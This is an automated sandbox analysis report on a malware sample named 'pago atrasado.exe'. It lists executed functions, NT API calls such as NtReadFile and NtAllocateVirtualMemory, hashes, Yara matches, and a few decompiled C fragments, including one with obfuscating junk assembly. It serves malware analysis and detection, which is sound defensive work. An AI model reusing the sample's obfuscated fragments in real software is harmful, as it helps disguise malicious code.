                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-1246513382
                                            • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                            • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                            • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                            • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004057E4, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004057E4(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                            0x004057f0
                                            0x004057f2
                                            0x0040581a
                                            0x004057ff
                                            0x00405804
                                            0x0040580f
                                            0x00000000
                                            0x0040582c
                                            0x00405818
                                            0x00405818
                                            0x00000000

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405804
                                            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405812
                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                            • Instruction ID: 6e20b17ba46ab238fcbb7c8296b2df733f1dbfa59429a89b2dba5ca226b3377d
                                            • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                            • Instruction Fuzzy Hash: C2F02733209D51ABC202AB255C00A2F7E98EF91320B24003AF440F2180D339AC219BFB
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: pago atrasado.exe PID: 2840 Parent PID: 4308 pago atrasado.exeCOMMON

                                            Executed Functions

                                            Function 0041867A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: !:A$b=A$b=A
                                            • API String ID: 2738559852-704622139
                                            • Opcode ID: 2edeae232ff652c8cb3864f0775789f917dcf87ab9fdd337eef6cabbdfcd0d56
                                            • Instruction ID: f0a7616db5dc8ab2843e66a576d22df772172ddbf993b150abda27aed2f380a7
                                            • Opcode Fuzzy Hash: 2edeae232ff652c8cb3864f0775789f917dcf87ab9fdd337eef6cabbdfcd0d56
                                            • Instruction Fuzzy Hash: C4F0F9B2200108ABCB14CF89CC84EEB77A9EF8C754F158249FA4D97241CA30E855CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                            0x00418683
                                            0x0041868f
                                            0x00418697
                                            0x0041869c
                                            0x004186a2
                                            0x004186bd
                                            0x004186c5
                                            0x004186c9

                                            APIs
                                            • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: !:A$b=A$b=A
                                            • API String ID: 2738559852-704622139
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004185CA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 41858fedc908b5a1f91db60ab38041ae9a9e476a531c8cec1085a650bcff829e
                                            • Instruction ID: e492d2eee3d474dd9e059b639aa8bb66731e046779164f58cf6d8ecf31579c31
                                            • Opcode Fuzzy Hash: 41858fedc908b5a1f91db60ab38041ae9a9e476a531c8cec1085a650bcff829e
                                            • Instruction Fuzzy Hash: 4601B6B2210208BBDB08CF89DC95EEB77EDAF8C754F158248FA0D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004186FB, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 0d193cf8b217e625361985bacf9208ab4e22c3a12280cd643bcd6388af92c4ca
                                            • Instruction ID: 1c0d342d4cf3058bb54a173b67a943a2e9698893856a94e0bab3fdaf19cfce77
                                            • Opcode Fuzzy Hash: 0d193cf8b217e625361985bacf9208ab4e22c3a12280cd643bcd6388af92c4ca
                                            • Instruction Fuzzy Hash: 85E0C2722002107BD714DBA4CC88FD77F68EF84360F0545A9F98DAB282C530E510C7D0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                            • Instruction ID: f09df2499df8cd06342f466bad1ea290f80e2b0de04fcdece786d66633cd5a27
                                            • Opcode Fuzzy Hash: 84136e98b8c539dcdc7bc1152f04e11a8c236a8929089585bdc33f02b7a8284b
                                            • Instruction Fuzzy Hash: FC90026160101502D20171694404656040A97D0381F91C432A1014555ECA6589D2F1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5725289bf9cb9a18bbac1d13960834bbe7db35d50ce7199407658aa744bb3935
                                            • Instruction ID: 8cda8a290229feab99281d60757bf8eee6e2f6044de430cbcb682a4c55ad418c
                                            • Opcode Fuzzy Hash: 5725289bf9cb9a18bbac1d13960834bbe7db35d50ce7199407658aa744bb3935
                                            • Instruction Fuzzy Hash: 5E90027120101413D21161694504747040997D0381F91C822A0414558D96968992F1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 125ced5f95c6c1b051f119c7778bad3fd4c508746aa89f49e68f76fcbeb10bc2
                                            • Instruction ID: 7f377594fd477e745db0d2365666abab7a85ba38085e1d36b8c60e47a0b3168f
                                            • Opcode Fuzzy Hash: 125ced5f95c6c1b051f119c7778bad3fd4c508746aa89f49e68f76fcbeb10bc2
                                            • Instruction Fuzzy Hash: A3900261242051525645B16944045474406A7E0381791C422A1404950C85669896E6A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c86a9d392f07e955db1249360b7cafd45cb4ef6ec5d9ced9444a7faf15cbbc00
                                            • Instruction ID: 642dd0def788fb938de69273999da7cd801649df2f03b5e1a960fec64ae0fb7f
                                            • Opcode Fuzzy Hash: c86a9d392f07e955db1249360b7cafd45cb4ef6ec5d9ced9444a7faf15cbbc00
                                            • Instruction Fuzzy Hash: D49002A134101442D20061694414B460405D7E1341F51C425E1054554D8659CC92B1A6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b31bdde2d1b987717d01bf1dfcde6960e36485f90e409bdde7e54f2892aa4f7a
                                            • Instruction ID: c7954daf700f4338adbdfeed6f0069a43556669194b8081608872ad512236bd5
                                            • Opcode Fuzzy Hash: b31bdde2d1b987717d01bf1dfcde6960e36485f90e409bdde7e54f2892aa4f7a
                                            • Instruction Fuzzy Hash: 099002B120101402D24071694404786040597D0341F51C421A5054554E86998DD5B6E5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: bc12cc90852784264a41e842c07085119ffbb635f883572748708e36f7ced849
                                            • Instruction ID: 3b687e96f199dd21cb378e9f49fe73b3375dc4ba105fcb134f0ba31fb03a36e3
                                            • Opcode Fuzzy Hash: bc12cc90852784264a41e842c07085119ffbb635f883572748708e36f7ced849
                                            • Instruction Fuzzy Hash: 01900261601010424240717988449464405BBE1351751C531A0988550D859988A5A6E5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 612cab346faee2a2896b33ff882960138fff993ae0d93629fe18983117be8c71
                                            • Instruction ID: 8df89223d9018c177ff8f1eb54fca35c11d7028d3a219ead17575dfc413adddf
                                            • Opcode Fuzzy Hash: 612cab346faee2a2896b33ff882960138fff993ae0d93629fe18983117be8c71
                                            • Instruction Fuzzy Hash: D690027120141402D2006169481474B040597D0342F51C421A1154555D86658891B5F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7ffc2905b5042f7d04fcdc7a1454891899331500f09ad93d6f973724eee17425
                                            • Instruction ID: 1bf617c2e1ee59fc22ddbed6eb5cdbdb23f82eb87c14a0d42622089325ef8903
                                            • Opcode Fuzzy Hash: 7ffc2905b5042f7d04fcdc7a1454891899331500f09ad93d6f973724eee17425
                                            • Instruction Fuzzy Hash: 2490026121181042D30065794C14B47040597D0343F51C525A0144554CC95588A1A5A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 870e9e64f1186944c5edc4c1df5934fee3388847d1cc6cc3687db1af99495f60
                                            • Instruction ID: c89522a2b032d0d00dff26a7a0b15994b5a58150f72595e5f04cdba066ffebc9
                                            • Opcode Fuzzy Hash: 870e9e64f1186944c5edc4c1df5934fee3388847d1cc6cc3687db1af99495f60
                                            • Instruction Fuzzy Hash: C79002A120201003420571694414656440A97E0341B51C431E1004590DC56588D1B1A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 49532390988a9440c05f1727f43bd7916d7b47b1aea43f9f1dc51011eb708867
                                            • Instruction ID: 6f023eacc869ff7f25b3af23d12435b2af70af3398e7feea62e8707887d18864
                                            • Opcode Fuzzy Hash: 49532390988a9440c05f1727f43bd7916d7b47b1aea43f9f1dc51011eb708867
                                            • Instruction Fuzzy Hash: 6E900265211010030205A5690704547044697D5391351C431F1005550CD66188A1A1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: db62a5de8047a782413a3a022e9aaab239c389c8b2349557f3af32b72d10dc5a
                                            • Instruction ID: 8205e1a92dd3e72244153608506a96a365a32d10630a253063b883e78df6617f
                                            • Opcode Fuzzy Hash: db62a5de8047a782413a3a022e9aaab239c389c8b2349557f3af32b72d10dc5a
                                            • Instruction Fuzzy Hash: 7690027120109802D2106169840478A040597D0341F55C821A4414658D86D588D1B1A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 90142e4dbd1f8e746439b5d0629a8375845f5fc80f0b3866089a85d99ccc6515
                                            • Instruction ID: 58efcbd6f734c61d2ad59f03bbfe76f3c83c9e217c82a060905bc2ba634e7742
                                            • Opcode Fuzzy Hash: 90142e4dbd1f8e746439b5d0629a8375845f5fc80f0b3866089a85d99ccc6515
                                            • Instruction Fuzzy Hash: 6D90027120101802D2807169440468A040597D1341F91C425A0015654DCA558A99B7E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4b56691091aa963c6f1b74e4d80d8efeff95033091da5b4e4a84147ed1c4afc1
                                            • Instruction ID: bc39d063fef2f08a8de5a0600114798c88d7b666a9122f203a008fdcbf199305
                                            • Opcode Fuzzy Hash: 4b56691091aa963c6f1b74e4d80d8efeff95033091da5b4e4a84147ed1c4afc1
                                            • Instruction Fuzzy Hash: 8890026130101003D240716954186464405E7E1341F51D421E0404554CD9558896A2A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a0ba5ca90099198f2c2626b4bb2b584521256a85b299a9cbaa7287e55bf2ee7b
                                            • Instruction ID: 7a9f111b437a2ce17f5b8e5668e2a5b3ba7da211e4f3bfefa99e87cadca76612
                                            • Opcode Fuzzy Hash: a0ba5ca90099198f2c2626b4bb2b584521256a85b299a9cbaa7287e55bf2ee7b
                                            • Instruction Fuzzy Hash: 1A90026921301002D2807169540864A040597D1342F91D825A0005558CC95588A9A3A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4e8da0864713dd6ef1d00f3d5a4c1816e64c0e73b59c0357034dba740e280a85
                                            • Instruction ID: 081c01b96c3e170aec37ee04d371d35005f4d4e547f399acb0f3bdc49266b50b
                                            • Opcode Fuzzy Hash: 4e8da0864713dd6ef1d00f3d5a4c1816e64c0e73b59c0357034dba740e280a85
                                            • Instruction Fuzzy Hash: D890027131115402D21061698404746040597D1341F51C821A0814558D86D588D1B1A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00A09710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326631867.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 950e482ae5bd42959139a1ecaec893c700667752a270b6ab420024c450ba823e
                                            • Instruction ID: 64f1f5af06b8ba630cc63a7c6f296be1647b0df368996297f46b3b2ce2f2b3b1
                                            • Opcode Fuzzy Hash: 950e482ae5bd42959139a1ecaec893c700667752a270b6ab420024c450ba823e
                                            • Instruction Fuzzy Hash: 1A90027120101402D20065A95408686040597E0341F51D421A5014555EC6A588D1B1B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                            • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                                            • Opcode Fuzzy Hash: 6f53d8dba07d61e040243f166c963dc1666f7821a055405fa8867365c30c6fdc
                                            • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004188D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 34%
                                            			E004188D4(void* __eax, void* __ecx, void* __edx, void* __eflags, void* _a4, long _a8, void* _a12) {
				char _v0;
				void* __esi;
				void* __ebp;
				void* _t10;

				_push(ss);
				if(__eflags < 0) {
					_push(__eax);
					_t10 = RtlAllocateHeap(__ecx); // executed
					return _t10;
				} else {
					__eflags = __eax & 0x7bf3ee02;
					__ch = __ch + __dh;
					asm("repe jnp 0x4f");
					__ch = __ch | __ah;
					asm("in al, 0x55");
					__ebp = __esp;
					__eax = _v0;
					__ecx =  *((intOrPtr*)(__eax + 0x10));
					_t5 = __eax + 0xc74; // 0xc74
					__esi = _t5;
					__eax = _a8;
					__ecx = _a4;
					__eax = RtlFreeHeap(_a4, _a8, _a12); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                            0x004188d4
                                            0x004188d5
                                            0x004188cb
                                            0x004188cd
                                            0x004188d1
                                            0x004188d7
                                            0x004188d7
                                            0x004188d8
                                            0x004188da
                                            0x004188dd
                                            0x004188df
                                            0x004188e1
                                            0x004188e3
                                            0x004188e6
                                            0x004188ef
                                            0x004188ef
                                            0x004188ff
                                            0x00418902
                                            0x0041890d
                                            0x0041890f
                                            0x00418910
                                            0x00418911
                                            0x00418911

                                            APIs
                                            • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFree
